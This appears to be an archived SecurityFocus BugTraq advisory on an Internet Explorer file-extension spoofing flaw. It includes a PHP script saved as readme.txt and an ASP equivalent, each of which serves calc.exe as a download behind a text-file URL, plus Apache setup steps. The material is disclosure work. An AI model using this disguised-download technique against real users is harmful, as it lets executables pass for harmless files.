Microsoft Internet Explorer Spoofable File Extensions Vulnerability

StatiC <static@tampabay.rr.com> submitted the following example to BugTraq:

With an apache/php server add .txt to the already existing .php extension in the apache.conf file, so that apache will recognise .txt extensions as php script files.

1. Copy the real windows calc.exe from a windows system to the html root dir.

2. Copy the readme.txt file below to the same html root dir.

3. go to the url http://yourserver/readme.txt

You will see the same behavior mentioned in the previous alert.

FILE <readme.txt> BEGIN ----
<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>
FILE <readme.txt> END ----

"Jonathan G. Lampe" <jonathan@stdnet.com> submitted this example in ASP for IIS webservers:

<%

Const adTypeBinary = 1
Dim strFilePath

Response.ContentType = "application/octet-stream"
Response.AddHeader "Content-Disposition","attachment; filename=calc.exe"

strFilePath = Server.MapPath(".") & "\calc.exe"

Set objStream = Server.CreateObject("ADODB.Stream")
objStream.Open
objStream.Type = adTypeBinary
objStream.LoadFromFile strFilePath

Response.BinaryWrite objStream.Read

objStream.Close
Set objStream = Nothing

%>


 

Privacy Statement
Copyright 2010, SecurityFocus